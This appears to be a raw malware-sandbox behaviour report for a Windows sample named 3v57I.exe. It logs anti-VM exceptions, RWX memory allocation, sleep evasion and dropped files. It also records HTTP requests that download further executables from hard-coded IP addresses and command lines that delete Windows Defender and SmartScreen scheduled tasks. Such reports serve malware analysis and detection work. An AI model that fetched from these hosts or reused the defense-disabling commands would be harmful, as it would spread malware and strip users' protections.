registers.esp: 1571412
registers.edi: 11499409
registers.eax: 30984
registers.ebp: 3999985684
registers.edx: 1585
registers.ebx: 11495093
registers.esi: 0
registers.ecx: 46461
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 89 e0 05 04 00 00 00 2d 04 00 00 00 87 04
exception.symbol: 3v57i+0x1d8172
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 1933682
exception.address: 0xaf8172
registers.esp: 1571416
registers.edi: 11530393
registers.eax: 30984
registers.ebp: 3999985684
registers.edx: 1585
registers.ebx: 11495093
registers.esi: 0
registers.ecx: 46461
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 b8 f5 49 df 7a bb e7 f1 6a 00 31 c3 e9 6d
exception.symbol: 3v57i+0x1d7c67
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 1932391
exception.address: 0xaf7c67
registers.esp: 1571416
registers.edi: 11502377
registers.eax: 1259
registers.ebp: 3999985684
registers.edx: 1585
registers.ebx: 11495093
registers.esi: 0
registers.ecx: 46461
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 3d 02 00 00 b8 00 9f db 7d 89 c7 58 55 bd
exception.symbol: 3v57i+0x1de9ff
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 1960447
exception.address: 0xafe9ff
registers.esp: 1571412
registers.edi: 4468431
registers.eax: 31982
registers.ebp: 3999985684
registers.edx: 11528144
registers.ebx: 1154559341
registers.esi: 0
registers.ecx: 14288
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 e9 00 00 00 00 89 1c 24 e9
exception.symbol: 3v57i+0x1df0c9
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 1962185
exception.address: 0xaff0c9
registers.esp: 1571416
registers.edi: 1114345
registers.eax: 31982
registers.ebp: 3999985684
registers.edx: 11560126
registers.ebx: 1154559341
registers.esi: 4294937736
registers.ecx: 14288
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 64 8f 05 00 00 00 00 56 89 14 24 50 89 24 24
exception.symbol: 3v57i+0x1e4cc4
exception.instruction: in eax, dx
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 1985732
exception.address: 0xb04cc4
registers.esp: 1571408
registers.edi: 1114345
registers.eax: 1447909480
registers.ebp: 3999985684
registers.edx: 22104
registers.ebx: 1969033397
registers.esi: 11534730
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb
exception.symbol: 3v57i+0x1e3a1c
exception.address: 0xb03a1c
exception.module: 3v57I.exe
exception.exception_code: 0xc000001d
exception.offset: 1980956
registers.esp: 1571408
registers.edi: 1114345
registers.eax: 1
registers.ebp: 3999985684
registers.edx: 22104
registers.ebx: 0
registers.esi: 11534730
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 70 37 2d 12 01
exception.symbol: 3v57i+0x1e3702
exception.instruction: in eax, dx
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 1980162
exception.address: 0xb03702
registers.esp: 1571408
registers.edi: 1114345
registers.eax: 1447909480
registers.ebp: 3999985684
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 11534730
registers.ecx: 10
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: cd 01 eb 00 0f b7 d3 6a 00 56 e8 03 00 00 00 20
exception.symbol: 3v57i+0x1e8be5
exception.instruction: int 1
exception.module: 3v57I.exe
exception.exception_code: 0xc0000005
exception.offset: 2001893
exception.address: 0xb08be5
registers.esp: 1571376
registers.edi: 0
registers.eax: 1571376
registers.ebp: 3999985684
registers.edx: 4294937846
registers.ebx: 11570422
registers.esi: 9439555
registers.ecx: 11569819
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 e9 07 01 00 00 50 81 34 24 5e 8f df 7e 5f
exception.symbol: 3v57i+0x1e979e
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 2004894
exception.address: 0xb0979e
registers.esp: 1571412
registers.edi: 1114345
registers.eax: 28632
registers.ebp: 3999985684
registers.edx: 2130566501
registers.ebx: 27664765
registers.esi: 537682432
registers.ecx: 11571345
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 61 01 00 00 50 57 e9 26 00 00 00 5a e9 06
exception.symbol: 3v57i+0x1e91c9
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 2003401
exception.address: 0xb091c9
registers.esp: 1571416
registers.edi: 1114345
registers.eax: 28632
registers.ebp: 3999985684
registers.edx: 6379
registers.ebx: 4294941472
registers.esi: 537682432
registers.ecx: 11599977
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 56 e9 a3 08 00 00 b9 15 79 bb 7d e9 3c 03 00
exception.symbol: 3v57i+0x1f7e1b
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 2063899
exception.address: 0xb17e1b
registers.esp: 1571412
registers.edi: 9957726
registers.eax: 26226
registers.ebp: 3999985684
registers.edx: 11631716
registers.ebx: 27664984
registers.esi: 1968968720
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 47 02 00 00 52 e9 06 07 00 00 83 c4 04 87
exception.symbol: 3v57i+0x1f7f4a
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 2064202
exception.address: 0xb17f4a
registers.esp: 1571416
registers.edi: 9957726
registers.eax: 26226
registers.ebp: 3999985684
registers.edx: 11657942
registers.ebx: 397801
registers.esi: 4294943952
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb ba 77 ff 9f 7c f7 da 55 bd c1 d3 7f 55 09 ea
exception.symbol: 3v57i+0x1fcebc
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 2084540
exception.address: 0xb1cebc
registers.esp: 1571408
registers.edi: 9957726
registers.eax: 4294940428
registers.ebp: 3999985684
registers.edx: 11657942
registers.ebx: 11680753
registers.esi: 604277079
registers.ecx: 11657942
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 7d 00 00 00 51 e9 ea 01 00 00 bd 04 00 00
exception.symbol: 3v57i+0x1feba5
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 2091941
exception.address: 0xb1eba5
registers.esp: 1571408
registers.edi: 9957726
registers.eax: 4294942644
registers.ebp: 3999985684
registers.edx: 11686594
registers.ebx: 11680753
registers.esi: 84201
registers.ecx: 7343447
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 68 fd ff ff 31 74 24 04 8b 34 24 e9 65 fc
exception.symbol: 3v57i+0x2037bf
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 2111423
exception.address: 0xb237bf
registers.esp: 1571408
registers.edi: 4294942532
registers.eax: 14827
registers.ebp: 3999985684
registers.edx: 2130566132
registers.ebx: 11705131
registers.esi: 84201
registers.ecx: 1787166720
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 1e f5 98 06 89 0c 24 56 53 68 07 79 c6 7c
exception.symbol: 3v57i+0x20e816
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 2156566
exception.address: 0xb2e816
registers.esp: 1571408
registers.edi: 28618
registers.eax: 31485
registers.ebp: 3999985684
registers.edx: 2130566132
registers.ebx: 11755974
registers.esi: 11740800
registers.ecx: 2142287216
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 c7 04 24 73 c2 33 7d 56 e9 fb 04 00 00 31
exception.symbol: 3v57i+0x20e914
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 2156820
exception.address: 0xb2e914
registers.esp: 1571408
registers.edi: 2886605672
registers.eax: 4294938588
registers.ebp: 3999985684
registers.edx: 2130566132
registers.ebx: 11755974
registers.esi: 11740800
registers.ecx: 2142287216
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 89 e1 81 c1 04 00 00 00 e9 bd fa ff ff ba
exception.symbol: 3v57i+0x223361
exception.instruction: sti
exception.module: 3v57I.exe
exception.exception_code: 0xc0000096
exception.offset: 2241377
exception.address: 0xb43361
registers.esp: 1571376
registers.edi: 8961365
registers.eax: 11837596
registers.ebp: 3999985684
registers.edx: 2130566132
registers.ebx: 1787211633
registers.esi: 11804050
registers.ecx: 1787166720
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.156.72.96/te4h2nus/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://80.64.18.219/files/5494432675/lYvr05n.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://80.64.18.219/files/6957769607/FuaxeNA.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://80.64.18.219/files/6586442134/OE1vOqz.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://80.64.18.219/files/6629342726/dDthTIC.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://80.64.18.219/newdef/random.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://80.64.18.219/files/unique2/random.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://80.64.18.219/files/fate/random.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://80.64.18.219/files/unique1/random.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://80.64.18.219/files/6336929412/bPtJj46.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://80.64.18.63/test/amnew.exe
request POST http://185.156.72.96/te4h2nus/index.php
request GET http://80.64.18.219/files/5494432675/lYvr05n.exe
request GET http://80.64.18.219/files/6957769607/FuaxeNA.exe
request GET http://80.64.18.219/files/6586442134/OE1vOqz.exe
request GET http://80.64.18.219/files/6629342726/dDthTIC.exe
request GET http://80.64.18.219/newdef/random.exe
request GET http://80.64.18.219/files/unique2/random.exe
request GET http://80.64.18.219/files/fate/random.exe
request GET http://80.64.18.219/files/unique1/random.exe
request GET http://80.64.18.219/files/6336929412/bPtJj46.exe
request GET http://80.64.18.63/test/amnew.exe
request POST http://185.156.72.96/te4h2nus/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2568
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2644
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2644
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e11000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 2936832
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02900000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73741000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 147456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c74000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c74000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c84000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 114688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2700
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72bf1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72b11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ad4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2700
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72b12000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d51000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ab1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72cc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72a74000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ab2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72911000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72951000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75b71000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76faf000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76f20000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 184320
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00921000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04430000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04440000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1484
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04450000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1484
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04460000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1484
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04470000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04480000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04470000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04470000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04470000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04470000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1484
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04470000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
description ramez.exe tried to sleep 137 seconds, actually delayed analysis time by 137 seconds
description 207216b66f.exe tried to sleep 304 seconds, actually delayed analysis time by 304 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 3251821
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3251821
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3250637
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3250637
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 13191364608
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer
total_number_of_bytes: 0
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13322825728
free_bytes_available: 13322825728
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 8594055765
root_path: C:\Users\test22\AppData\Roaming\MyApp\
total_number_of_bytes: 17825321166500176
0 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 13258788864
root_path: C:\Users\test22\AppData\Roaming\
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Local\Temp\10020490101\207216b66f.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\3v57I.exe
file C:\Users\test22\AppData\Local\Temp\10019230101\dDthTIC.exe
file C:\Users\test22\AppData\Local\Temp\10020530101\lYvr05n.exe
file C:\Users\test22\AppData\Local\Temp\10020500101\39d8455be9.exe
file C:\Users\test22\AppData\Local\Temp\Work\cecho.exe
file C:\Users\test22\AppData\Local\Temp\10015950101\lYvr05n.exe
file C:\Users\test22\AppData\Local\Temp\10020170101\2d05347e68.exe
file C:\Users\test22\AppData\Local\Temp\10018450101\OE1vOqz.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\2y9197.exe
file C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\68140be001524.vbs
file C:\Users\test22\AppData\Local\Temp\10020560101\08IyOOF.exe
file C:\Users\test22\AppData\Local\Temp\34.bat
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\1z90E9.exe
file C:\Users\test22\AppData\Local\Temp\10020520101\dDthTIC.exe
file C:\Users\test22\AppData\Local\Temp\Work\nircmd.exe
file C:\Users\test22\AppData\Local\Temp\10020540101\bPtJj46.exe
file C:\Users\test22\AppData\Local\Temp\Work\NSudoLG.exe
file C:\Users\test22\AppData\Local\Temp\10020550101\amnew.exe
file C:\Users\test22\AppData\Local\Temp\Work\7z.exe
file C:\Users\test22\AppData\Local\Temp\10017910101\FuaxeNA.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v7n53.exe
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
cmdline schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
cmdline "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\34.bat" any_word
cmdline schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
cmdline C:\Windows\system32\cmd.exe /c ver
cmdline schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f
cmdline C:\Windows\system32\cmd.exe /S /D /c" ver "
cmdline C:\Windows\system32\cmd.exe /c tasklist
cmdline cmd.exe /c 68140be001524.vbs
cmdline schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
cmdline schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
